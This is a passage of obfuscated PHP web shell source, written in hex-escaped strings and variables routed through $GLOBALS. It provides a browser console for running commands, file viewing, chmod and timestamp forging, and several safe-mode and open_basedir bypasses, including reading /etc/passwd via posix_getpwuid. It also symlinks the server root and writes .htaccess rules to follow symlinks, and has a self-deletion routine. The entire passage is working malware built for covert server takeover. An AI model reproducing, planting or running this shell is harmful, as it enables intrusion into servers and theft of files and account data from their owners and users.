\\x6f\\x6e\\x63\\x6ci\\x63\\x6b\\x3d\\\"\\x67(nu\\x6cl,nu\\x6c\\x6c,n\\x75l\\x6c,\\x27\".strtolower(${$yhphmmr}).\"')\\\"\\x3e\".((strtolower(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x65ud\\x6f\\x75e\"]})==@$_POST[\"p2\"])?\"<\\x62>[\\x20\".${$vuykctjpl}.\" ]\":${$wqerdybwvn}).\"\\x3c/\\x61>\\x20\";echo\"\\x3c\\x62r\\x3e\\x3c\\x62\\x72\\x3e\";switch($_POST[\"\\x702\"]){case\"view\":echo\"\";${$sqyvxzfnir}=@fopen($_POST[\"p\\x31\"],\"\\x72\");if(${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6a\\x65\\x6f\\x62f\\x70\\x67n\\x6bq\\x70k\"]}){while(!@feof(${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70g\\x6e\\x6b\\x71pk\"]}))echo htmlspecialchars(@fread(${${\"\\x47LO\\x42ALS\"}[\"j\\x65\\x6f\\x62\\x66\\x70\\x67\\x6ekq\\x70\\x6b\"]},1024));@fclose(${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x6ae\\x6fb\\x66pg\\x6ekq\\x70\\x6b\"]});}echo\"\"),array(\"\"),${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"ba\\x78di\\x69\\x6f\\x76bk\"]}).\"\\x3c/\\x64\\x69\\x76>\";}break;case\"c\\x68mod\":if(!empty($_POST[\"p\\x33\"])){${\"\\x47\\x4cOBA\\x4cS\"}[\"\\x67\\x61\\x78i\\x71\\x69\"]=\"p\\x65r\\x6ds\";$whytseypu=\"i\";${\"\\x47L\\x4fBAL\\x53\"}[\"\\x6f\\x69k\\x7a\\x64b\\x6f\\x71\"]=\"i\";$dfkbfztemjv=\"\\x70\\x65\\x72m\\x73\";${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x70c\\x67ky\\x67r\\x6fs\\x72\\x65\"]=\"i\";${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x67\\x61x\\x69\\x71i\"]}=0;for(${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"p\\x63g\\x6b\\x79g\\x72\\x6f\\x73\\x72\\x65\"]}=strlen($_POST[\"\\x70\\x33\"])-1;${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x75\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63b\"]}>=0;--${$whytseypu})${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x75\\x6e\\x6eg\\x65\\x7a\\x69\\x73mj\"]}+=(int)$_POST[\"\\x703\"][${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"\\x75\\x62\\x6ag\\x6d\\x69\\x79\\x76\\x73c\\x62\"]}]*pow(8,(strlen($_POST[\"p\\x33\"])-${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"o\\x69\\x6b\\x7ad\\x62\\x6f\\x71\"]}-1));if(!@chmod($_POST[\"\\x701\"],${$dfkbfztemjv}))echo\"\\x43an't\\x20\\x73et\\x20pe\\x72\\x6dissio\\x6es!\\x3c\\x62r\\x3edoc\\x75\\x6de\\x6e\\x74.m\\x66\\x2e\\x703\\x2e\\x76\\x61\\x6cue\\x3d\\x22\\\";\\n\";else die(\"\\x3cs\\x63\\x72\\x69\\x70\\x74>g(n\\x75\\x6c\\x6c,\\x6e\\x75l\\x6c,nu\\x6c\\x6c,\\x6e\\x75ll,\\x22\\x22)<\\x69n\\x70\\x75t \\x74\\x79pe=\\x73u\\x62\\x6dit va\\x6c\\x75e=\\x22>\\x3e\\\"\\x3e\\x3cte\\x78t\\x61rea\\x20\\x6eame=te\\x78\\x74 class=\\x62\\x69g\\x61\\x72e\\x61\\x3e\";${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x6ae\\x6f\\x62fp\\x67\\x6ekq\\x70\\x6b\"]}=@fopen($_POST[\"\\x701\"],\"r\");if(${$gmqjhxp}){$crgttuutvp=\"\\x66\\x70\";$vsfiuyv=\"\\x66\\x70\";while(!@feof(${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"j\\x65\\x6f\\x62\\x66\\x70gn\\x6bqpk\"]}))echo htmlspecialchars(@fread(${$crgttuutvp},1024));@fclose(${$vsfiuyv});}echo\"\\x3c/t\\x65\\x78\\x74\\x61re\\x61\\x3e<\\x69n\\x70u\\x74\\x20\\x74y\\x70e=\\x73ubm\\x69t \\x76\\x61\\x6c\\x75e\\x3d\\x22>>\\x22\\x3e\\x3c/\\x66\\x6frm\\x3e\";break;case\"\\x68e\\x78du\\x6d\\x70\":${$bjlnhixvm}=@file_get_contents($_POST[\"\\x701\"]);${${\"\\x47LOB\\x41LS\"}[\"\\x6a\\x65y\\x65\\x6a\\x65\\x6a\\x76e\\x73\"]}=0;${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"e\\x6er\\x73t\\x78\"]}=array(\"\\x300\\x3000\\x30\\x300\\x3c\\x62r>\",\"\",\"\");${${\"\\x47\\x4cO\\x42ALS\"}[\"\\x78\\x6b\\x63\\x71\\x72\\x6c\\x64\\x6by\"]}=strlen(${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"f\\x6d\\x75\\x6a\\x6f\\x6a\\x6d\\x6f\\x6c\"]});for(${$rladbqkw}=0;${${\"\\x47\\x4c\\x4fBALS\"}[\"ubj\\x67\\x6d\\x69\\x79\\x76scb\"]}<${${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"x\\x6az\\x73\\x6en\\x6f\"]};++${${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69\\x79\\x76\\x73c\\x62\"]}){$lpxtbylf=\"\\x63\";$uilusisex=\"h\";${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x6b\\x65w\\x6d\\x70\\x6f\\x73\\x74\\x6e\\x76\\x6d\"]=\"h\";${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x71\\x70\\x73\\x6a\\x75p\"]=\"\\x6e\";${\"\\x47L\\x4fBAL\\x53\"}[\"kv\\x65\\x62\\x69i\\x6ek\\x6d\"]=\"\\x63\";$kclxydc=\"c\";${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"k\\x6b\\x79z\\x70h\\x6b\"]=\"\\x69\";$pderycy=\"\\x69\";${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x75\\x70\\x74x\\x6c\\x68\\x6b\"]}[1].=sprintf(\"%\\x302\\x58\",ord(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6bv\\x65b\\x69\\x69\\x6ek\\x6d\"]}[${${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"ub\\x6agm\\x69\\x79\\x76\\x73\\x63\\x62\"]}])).\" \";switch(ord(${$lpxtbylf}[${${\"\\x47LOB\\x41LS\"}[\"\\x6b\\x6b\\x79\\x7a\\x70\\x68\\x6b\"]}])){case 0:${${\"\\x47L\\x4f\\x42ALS\"}[\"\\x75\\x70tx\\x6c\\x68k\"]}[2].=\"\\x20\";break;case 9:${${\"GLOB\\x41\\x4c\\x53\"}[\"\\x6be\\x77m\\x70\\x6f\\x73\\x74\\x6e\\x76\\x6d\"]}[2].=\" \";break;case 10:${$uilusisex}[2].=\"\\x20\";break;case 13:${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x75\\x70\\x74\\x78\\x6c\\x68\\x6b\"]}[2].=\"\\x20\";break;default:${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x75\\x70\\x74\\x78\\x6ch\\x6b\"]}[2].=${$kclxydc}[${$pderycy}];break;}${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6aey\\x65\\x6a\\x65\\x6a\\x76\\x65s\"]}++;if(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"\\x71\\x70s\\x6a\\x75\\x70\"]}==32){$xcoyhwoulc=\"\\x6e\";${$xcoyhwoulc}=0;$lulehit=\"\\x68\";if(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69\\x79\\x76\\x73\\x63\\x62\"]}+1<${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"x\\x6b\\x63\\x71\\x72\\x6c\\x64\\x6b\\x79\"]}){${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6d\\x71\\x6ev\\x77\\x6ds\\x77b\\x6a\\x67\"]=\"\\x68\";${${\"\\x47L\\x4f\\x42\\x41LS\"}[\"\\x6d\\x71n\\x76\\x77\\x6d\\x73\\x77\\x62\\x6a\\x67\"]}[0].=sprintf(\"%0\\x38\\x58\",${${\"\\x47\\x4cOB\\x41\\x4cS\"}[\"\\x75b\\x6a\\x67\\x6d\\x69\\x79\\x76\\x73\\x63b\"]}+1).\"<\\x62\\x72>\";}${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"u\\x70\\x74xl\\x68k\"]}[1].=\"
\";${$lulehit}[2].=\"\\n\";}}echo\"<\\x74\\x61ble c\\x65\\x6c\\x6csp\\x61ci\\x6eg\\x3d1\\x20c\\x65\\x6c\\x6c\\x70\\x61\\x64\\x64\\x69\\x6eg=5 \\x62gcolor\\x3d\\x2322\\x322\\x32\\x32\\x3e<\\x74\\x72><\\x74d bgcol\\x6f\\x72=#\\x33\\x33333\\x33\\x3e\\x3cs\\x70a\\x6e s\\x74\\x79l\\x65=\\x22fon\\x74-weig\\x68t: \\x6eo\\x72\\x6da\\x6c;\\n\\\">\\x3c\\x70\\x72\\x65\\x3e\".${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"hwb\\x72\\x6b\\x74\\x67p\"]}[0].\"\\x3c/t\\x64>\\x3ctd\\x20b\\x67\\x63o\\x6c\\x6f\\x72\\x3d\\x23\\x328\\x32\\x3828><\\x70\\x72\\x65\\x3e\".${${\"\\x47L\\x4fBAL\\x53\"}[\"ec\\x69\\x74\\x79r\\x6eo\"]}[1].\"\\x3c/\\x70\\x72e\\x3e\\x3c/\\x74d>\\x3c\\x74\\x64\\x20bgc\\x6flo\\x72\\x3d#3333\\x333><\\x70\\x72e>\".htmlspecialchars(${${\"\\x47\\x4c\\x4fBA\\x4cS\"}[\"\\x75\\x70txl\\x68k\"]}[2]).\"\\x3c/pr\\x65>\\x3c/td>\\x3c/\\x74r>\\x3c\\x69n\\x70ut ty\\x70e=te\\x78\\x74 \\x6ea\\x6de=n\\x61\\x6d\\x65\\x20\\x76alue\\x3d\\x22\".htmlspecialchars($_POST[\"p\\x31\"]).\"\\x22>\\x3ci\\x6e\\x70\\x75t\\x20\\x74\\x79\\x70\\x65=submi\\x74\\x20v\\x61\\x6cue=\\x22\\x3e\\x3e\\\"\\x3e\\x3c/\\x66\\x6f\\x72\\x6d\\x3e\";break;case\"\\x74\\x6fuch\":if(!empty($_POST[\"\\x70\\x33\"])){${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x68g\\x63\\x68\\x6d\\x67\\x75\"]=\"\\x74i\\x6de\";${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x68\\x67\\x63\\x68m\\x67\\x75\"]}=strtotime($_POST[\"p3\"]);if(${${\"G\\x4cO\\x42A\\x4cS\"}[\"\\x70\\x6e\\x70t\\x6e\\x70\\x6b\"]}){${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6e\\x65\\x71ps\\x73j\\x70\\x76\"]=\"\\x74\\x69\\x6d\\x65\";if(@touch($_POST[\"p1\"],${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6ee\\x71\\x70\\x73\\x73jp\\x76\"]},${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x70\\x6e\\x70\\x74n\\x70\\x6b\"]}))die(\"<\\x73cr\\x69\\x70\\x74\\x3e\\x67(\\x6eull,\\x6eu\\x6cl,\\x6e\\x75\\x6cl,\\x6eu\\x6cl,\\\"\\x22)\\x64ocu\\x6dent.\\x6d\\x66\\x2ep\\x33\\x2ev\\x61lu\\x65\\x3d\\\"\\\";\\n\\x22>\\x3c/form\\x3e\";break;case\"\\x6dk\\x66il\\x65\":break;}echo\"\\x3c/\\x64i\\x76\\x3e\";printFooter();}function actionSafeMode(){$pqwskyvvqk=\"t\\x65\\x6d\\x70\";${$pqwskyvvqk}=\"\";$zwneehmhg=\"\\x66\\x69\\x6c\\x65\\x73\";$bympscvsk=\"\\x74\\x65m\\x70\";ob_start();switch($_POST[\"p1\"]){case 1:${$bympscvsk}=@tempnam(${${\"G\\x4c\\x4fB\\x41L\\x53\"}[\"\\x71w\\x6c\\x66g\\x6a\"]},\"c\\x78\");if(@copy(\"com\\x70\\x72ess\\x2ezl\\x69b://\".$_POST[\"p\\x32\"],${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"\\x70\\x72\\x6b\\x6b\\x77\\x6ej\\x65\"]})){${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"y\\x6e\\x65\\x72\\x6bb\\x78\\x76xs\"]=\"tem\\x70\";echo@file_get_contents(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"yn\\x65\\x72k\\x62x\\x76x\\x73\"]});unlink(${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72k\\x6b\\x77n\\x6ae\"]});}else echo\"\\x53\\x6fr\\x72y.\\x2e.\\x20Ca\\x6e't\\x20op\\x65n file\";break;case 2:${$zwneehmhg}=glob($_POST[\"p2\"].\"*\");if(is_array(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"umw\\x67v\\x64\\x67e\"]})){$fvtjcrlfebs=\"\\x66ile\\x73\";$xogxmm=\"\\x66\\x69\\x6c\\x65na\\x6d\\x65\";foreach(${$fvtjcrlfebs} as${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"\\x67j\\x6du\\x66\\x64h\\x78\\x6f\"]})echo${$xogxmm}.\"\\n\";}break;case 3:${${\"G\\x4c\\x4fB\\x41LS\"}[\"sd\\x71c\\x70p\\x65q\\x6c\"]}=curl_init(\"\\x66\\x69l\\x65://\".$_POST[\"p2\"].\"\\x00\".SELF_PATH);curl_exec(${${\"\\x47\\x4cOBALS\"}[\"\\x73\\x64q\\x63\\x70pe\\x71\\x6c\"]});break;case 4:ini_restore(\"\\x73\\x61\\x66\\x65_\\x6dod\\x65\");ini_restore(\"\\x6fp\\x65\\x6e\\x5f\\x62\\x61s\\x65d\\x69r\");include($_POST[\"\\x70\\x32\"]);break;case 5:for(;$_POST[\"\\x70\\x32\"]<=$_POST[\"\\x70\\x33\"];$_POST[\"\\x702\"]++){${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"c\\x75\\x6ag\\x69\\x6f\\x64o\"]=\"\\x75\\x69\\x64\";$mylpwpdei=\"\\x75\\x69\\x64\";${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"c\\x75\\x6a\\x67\\x69odo\"]}=@posix_getpwuid($_POST[\"\\x702\"]);if(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x65p\\x64\\x6a\\x73i\\x63\\x72\\x6d\"]})echo join(\":\",${$mylpwpdei}).\"\\n\";}break;case 6:if(!function_exists(\"\\x69m\\x61p_o\\x70\\x65n\"))break;${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x75\\x6a\\x70\\x62\\x76\\x63\\x77l\"]}=imap_open($_POST[\"p2\"],\"\",\"\");if(${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"\\x75jp\\x62\\x76cw\\x6c\"]}==FALSE)break;echo imap_body(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75j\\x70\\x62\\x76\\x63\\x77\\x6c\"]},1);imap_close(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x6ap\\x62\\x76\\x63\\x77l\"]});break;}${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72\\x6b\\x6bw\\x6e\\x6a\\x65\"]}=ob_get_clean();printHeader();echo\"<\\x64i\\x76 c\\x6ca\\x73\\x73\\x3dcon\\x74\\x65nt>\";${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x77\\x65\\x78\\x63k\\x6ab\\x70\\x71\"]=\"\\x74e\\x6d\\x70\";echo\"<\\x73\\x70\\x61n>C\\x6f\\x70y (r\\x65a\\x64\\x20file)\\x3c/\\x73\\x70an>\\x3c\\x66or\\x6d\\x20\\x6f\\x6e\\x73u\\x62mi\\x74\\x3d'g(n\\x75l\\x6c,\\x6eu\\x6c\\x6c,\\x221\\\",th\\x69\\x73.para\\x6d\\x2e\\x76\\x61\\x6c\\x75\\x65)\\x3b\\n\\x72\\x65tu\\x72\\x6e f\\x61ls\\x65\\x3b\\n\\x27\\x3e\\x3cin\\x70\\x75\\x74 ty\\x70\\x65\\x3d\\x74\\x65\\x78\\x74 \\x6eam\\x65=pa\\x72am><\\x69\\x6e\\x70ut\\x20\\x74ype\\x3d\\x73\\x75\\x62m\\x69\\x74\\x20\\x76al\\x75\\x65\\x3d\\\"\\x3e>\\x22\\x3eGlob (l\\x69\\x73\\x74 d\\x69r)\\x3cfo\\x72m\\x20o\\x6esub\\x6d\\x69\\x74\\x3d'\\x67(\\x6eu\\x6c\\x6c,\\x6eull,\\\"\\x32\\x22,this.p\\x61\\x72\\x61m\\x2ev\\x61l\\x75e)\\x3b\\nre\\x74\\x75rn \\x66\\x61l\\x73\\x65\\x3b\\n'>\\x3ci\\x6e\\x70\\x75\\x74\\x20\\x74\\x79p\\x65\\x3d\\x74e\\x78t\\x20\\x6ea\\x6de\\x3d\\x70aram>\\x3c\\x69np\\x75\\x74\\x20\\x74y\\x70\\x65\\x3ds\\x75\\x62mit\\x20v\\x61\\x6c\\x75\\x65\\x3d\\x22>>\\\"\\x3e\\x3c\\x62\\x72\\x3e\\x3cspa\\x6e>\\x43\\x75\\x72\\x6c\\x20(re\\x61\\x64\\x20f\\x69l\\x65)\\x3c\\x66or\\x6d \\x6f\\x6e\\x73ub\\x6d\\x69t\\x3d\\x27g(\\x6eu\\x6c\\x6c,nu\\x6cl,\\x22\\x33\\\",\\x74h\\x69s.\\x70a\\x72\\x61\\x6d\\x2e\\x76\\x61\\x6c\\x75\\x65);\\nret\\x75r\\x6e \\x66\\x61\\x6cse\\x3b\\n\\x27>\\x3c\\x69\\x6e\\x70ut\\x20\\x74y\\x70\\x65\\x3dte\\x78\\x74\\x20n\\x61\\x6d\\x65=\\x70\\x61r\\x61\\x6d\\x3e\\x3cin\\x70\\x75t\\x20\\x74\\x79\\x70\\x65=\\x73\\x75\\x62m\\x69\\x74 \\x76al\\x75\\x65\\x3d\\x22>\\x3e\\x22\\x3e<\\x62\\x72\\x3e\\x3c\\x73\\x70an\\x3eI\\x6ei\\x5f\\x72est\\x6fr\\x65 (r\\x65ad fil\\x65)\\x3c/s\\x70\\x61\\x6e>\\x3c\\x66or\\x6d\\x20onsub\\x6di\\x74=\\x27\\x67(\\x6eu\\x6cl,\\x6e\\x75l\\x6c,\\\"4\\x22,this.\\x70\\x61ra\\x6d\\x2ev\\x61\\x6c\\x75e);\\nret\\x75\\x72\\x6e\\x20fal\\x73\\x65;\\n\\x27>\\x3c\\x69n\\x70\\x75t\\x20ty\\x70\\x65=\\x74ext\\x20\\x6e\\x61\\x6de=p\\x61ra\\x6d><\\x69nput \\x74\\x79p\\x65=su\\x62mi\\x74\\x20\\x76alu\\x65\\x3d\\x22>>\\x22\\x3e\\x3c/f\\x6f\\x72m\\x3e\\x3c\\x62\\x72>\\x3c\\x73\\x70a\\x6e>Po\\x73\\x69x_\\x67et\\x70\\x77\\x75i\\x64\\x20(\\\"Rea\\x64\\x22 /\\x65t\\x63/\\x70as\\x73wd)\\x3c/s\\x70\\x61n\\x3e<\\x74\\x61\\x62\\x6c\\x65\\x3e\\x3ctd\\x3eFrom<\\x74\\x64>\\x3c\\x69n\\x70u\\x74 t\\x79p\\x65\\x3dt\\x65\\x78t\\x20\\x6e\\x61\\x6d\\x65\\x3dpara\\x6d1 \\x76alue=0>\\x3c/td>\\x3c\\x74d>\\x3cinpu\\x74\\x20\\x74yp\\x65\\x3dt\\x65\\x78\\x74 n\\x61\\x6de\\x3dp\\x61ram\\x32 va\\x6c\\x75e=10\\x30\\x30>\\x3c/\\x74r>\\x3c/\\x74\\x61bl\\x65\\x3e\\x3e\\\">\\x3c/\\x66\\x6f\\x72\\x6d>\\x3c\\x62r>\\x3c\\x62r\\x3e\\x3cs\\x70\\x61n>\\x49\\x6da\\x70_\\x6f\\x70\\x65n (\\x72e\\x61\\x64 fil\\x65)\\x3c/s\\x70\\x61\\x6e\\x3e\\nif(w\\x69n\\x64\\x6fw\\x2eE\\x76en\\x74) w\\x69n\\x64\\x6f\\x77.\\x63\\x61\\x70t\\x75\\x72\\x65\\x45\\x76en\\x74\\x73(E\\x76ent\\x2eK\\x45Y\\x44OW\\x4e)\\x3b\\n\\x76a\\x72 cmds\\x20\\x3d\\x20n\\x65w\\x20Ar\\x72ay(\\\"\\\");\\nv\\x61\\x72\\x20\\x63\\x75r\\x20\\x3d\\x200;\\n\\x66\\x75\\x6e\\x63t\\x69\\x6f\\x6e k\\x70(\\x65)\\x20{\\n\\t\\x76\\x61\\x72\\x20\\x6e\\x20= (\\x77\\x69\\x6edow.Eve\\x6e\\x74)\\x20? \\x65\\x2e\\x77hich\\x20: e\\x2ek\\x65\\x79Code\\x3b\\n\\t\\x69f(\\x6e \\x3d= 38) {\\n\\t\\tc\\x75\\x72--\\x3b\\n\\t\\tif(\\x63\\x75\\x72>=\\x30)\\n\\t\\t\\t\\x64oc\\x75\\x6de\\x6e\\x74\\x2ecf.c\\x6d\\x64\\x2e\\x76a\\x6c\\x75\\x65\\x20= cm\\x64\\x73[\\x63u\\x72];\\n\\t\\t\\x65\\x6cs\\x65\\n\\t\\t\\t\\x63\\x75\\x72++\\x3b\\n\\t} \\x65\\x6cs\\x65 if(\\x6e\\x20=\\x3d \\x34\\x30) {\\n\\t\\tcur++;\\n\\t\\t\\x69\\x66(c\\x75\\x72\\x20\\x3c \\x63m\\x64\\x73\\x2elen\\x67th)\\n\\t\\t\\t\\x64o\\x63um\\x65nt.\\x63f\\x2e\\x63\\x6d\\x64\\x2eval\\x75\\x65 \\x3d\\x20c\\x6dds[\\x63\\x75r]\\x3b\\n\\t\\te\\x6cs\\x65\\n\\t\\t\\tcur--\\x3b\\n\\t}\\n}\\nf\\x75n\\x63ti\\x6fn \\x61\\x64d(c\\x6dd) {\\n\\tcmd\\x73\\x2epo\\x70()\\x3b\\n\\t\\x63\\x6dds.\\x70us\\x68(cm\\x64);\\n\\tc\\x6dds\\x2e\\x70\\x75sh(\\\"\\\");\\n\\t\\x63u\\x72\\x20\\x3d\\x20\\x63mds\\x2e\\x6c\\x65n\\x67\\x74h-1\\x3b\\n}\\n\\n\\n\";$rjvknpts=\"\\x76\";echo\"
Con\\x73\\x6f\\x6c\\x65\\x3c/h1>\\x3cd\\x69\\x76 \\x63\\x6c\\x61s\\x73\\x3d\\x63\\x6fnt\\x65nt\\x3e\\x3cf\\x6f\\x72m\\x20name\\x3d\\x63f \\x6fnsu\\x62m\\x69\\x74\\x3d\\\"if(\\x64\\x6f\\x63\\x75\\x6d\\x65nt\\x2ec\\x66\\x2ec\\x6d\\x64.\\x76a\\x6cue\\x3d\\x3d\\x27cl\\x65\\x61r'){\\x64\\x6f\\x63\\x75m\\x65n\\x74.\\x63\\x66\\x2eo\\x75\\x74p\\x75\\x74\\x2e\\x76\\x61l\\x75\\x65='\\x27\\x3b\\n\\x64\\x6fcum\\x65nt\\x2ec\\x66\\x2ecm\\x64\\x2e\\x76\\x61l\\x75e='\\x27\\x3b\\n\\x72\\x65tu\\x72n \\x66al\\x73\\x65\\x3b\\n}add(t\\x68i\\x73.c\\x6d\\x64\\x2e\\x76\\x61lue);\\ni\\x66(t\\x68\\x69s.\\x61\\x6aa\\x78.\\x63he\\x63\\x6b\\x65\\x64){\\x61(nu\\x6c\\x6c,\\x6e\\x75l\\x6c,this.c\\x6d\\x64\\x2eva\\x6cue);\\n}e\\x6c\\x73\\x65{g(\\x6eu\\x6c\\x6c,n\\x75l\\x6c,\\x74h\\x69s.cm\\x64.\\x76\\x61lue)\\x3b\\n}\\x20return \\x66\\x61lse;\\n\\\"\\x3e\\x3c\\x73\\x65\\x6cec\\x74 \\x6eam\\x65\\x3d\\x61li\\x61\\x73\\x3e\";foreach($GLOBALS[\"a\\x6c\\x69a\\x73\\x65s\"]as${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6ae\\x79e\\x6ae\\x6av\\x65s\"]}=>${$rjvknpts}){${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"s\\x73\\x69e\\x6ej\\x69s\"]=\"\\x76\";if(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"ssie\\x6e\\x6a\\x69\\x73\"]}==\"\"){echo\"\\x3c\\x6f\\x70t\\x67r\\x6fup\\x20la\\x62\\x65\\x6c\\x3d\\\"-\".htmlspecialchars(${${\"GL\\x4f\\x42ALS\"}[\"j\\x65\\x79\\x65\\x6ae\\x6a\\x76\\x65\\x73\"]}).\"-\\\"> se\\x6ed\\x20\\x75\\x73\\x69\\x6eg\\x20A\\x4a\\x41\\x58<\\x62r/>\\x3c\\x74\\x65x\\x74area \\x63la\\x73s\\x3db\\x69\\x67\\x61\\x72\\x65a n\\x61m\\x65\\x3d\\x6f\\x75tp\\x75t \\x73t\\x79\\x6ce=\\x22\\x62\\x6f\\x72\\x64er-b\\x6f\\x74tom:\\x30\\x3b\\nm\\x61rgi\\x6e:\\x30;\\n\\x22\\x20rea\\x64only>\";if(!empty($_POST[\"\\x701\"])){echo htmlspecialchars(\"\\$ \".$_POST[\"\\x70\\x31\"].\"\\n\".ex($_POST[\"p\\x31\"]));}echo\"\\x3c\\x69n\\x70ut \\x74y\\x70\\x65=t\\x65\\x78\\x74 name=cm\\x64\\x20sty\\x6ce\\x3d\\x22\\x62or\\x64\\x65r-\\x74o\\x70:0\\x3b\\nw\\x69d\\x74h:\\x3100\\x25;\\n\\x6da\\x72g\\x69n:\\x30;\\n\\x22 \\x6f\\x6e\\x6b\\x65\\x79do\\x77n=\\\"k\\x70(\\x65\\x76e\\x6e\\x74);\\n\\\"\\x3e\";echo\"\";printFooter();}function actionLogout(){unset($_SESSION[md5($_SERVER[\"HT\\x54\\x50_\\x48\\x4fS\\x54\"])]);echo\"bye!\";}function actionSelfRemove(){printHeader();if($_POST[\"\\x701\"]==\"ye\\x73\"){if(@unlink(SELF_PATH))die(\"\\x53\\x68\\x65ll\\x20\\x68a\\x73 b\\x65\\x65n rem\\x6f\\x76e\\x64\");else echo\"\\x75\\x6elink \\x65\\x72r\\x6fr\\x21\";}echo\"<\\x68\\x31>\\x53uicid\\x65\\x3c/\\x681><\\x64iv\\x20clas\\x73=co\\x6e\\x74\\x65nt>Re\\x61\\x6c\\x6cy\\x20w\\x61nt t\\x6f re\\x6d\\x6f\\x76\\x65\\x20\\x74\\x68\\x65\\x20s\\x68\\x65l\\x6c?<\\x62r>\";printFooter();}function actionTools(){printHeader();printFooter();}function actionDomains(){${\"G\\x4cOBA\\x4cS\"}[\"\\x6ft\\x6e\\x64\\x6d\\x63\\x6b\"]=\"\\x63\";printHeader();$czenigt=\"\\x640\\x6d\\x61\\x69ns\";error_reporting(0);echo\"<\\x74itl\\x65\\x3e\\x23D\\x6f\\x6da\\x69n\\x73 &\\x20\\x55se\\x72s\\x3c/\\x74\\x69\\x74l\\x65\\x3e\";mkdir(\"s\\x79\\x6d\");symlink(\"/\",\"\\x30/\\x78\\x2et\\x78t\");${${\"G\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6ft\\x6e\\x64\\x6dck\"]}=\"O\\x70\\x74\\x69o\\x6es I\\x6ed\\x65\\x78\\x65s F\\x6fllow\\x53\\x79\\x6dLinks \\n Dir\\x65\\x63to\\x72yI\\x6e\\x64\\x65x\\x20s\\x73ss\\x73s.\\x68t\\x6d \\n Ad\\x64\\x54y\\x70\\x65 \\x74x\\x74 .ph\\x70 \\n A\\x64\\x64\\x48andle\\x72 tx\\x74 .\\x70\\x68p\\x20\\n \\x41d\\x64\\x54\\x79p\\x65 t\\x78t\\x20.h\\x74\\x6d\\x6c \\n\\x20\\x41dd\\x48andler\\x20\\x74xt .h\\x74m\\x6c \\n O\\x70t\\x69\\x6f\\x6e\\x73 a\\x6c\\x6c\\x20\\n \\x4fptio\\x6es \\n \\x41ll\\x6f\\x77 from \\x61ll \\n 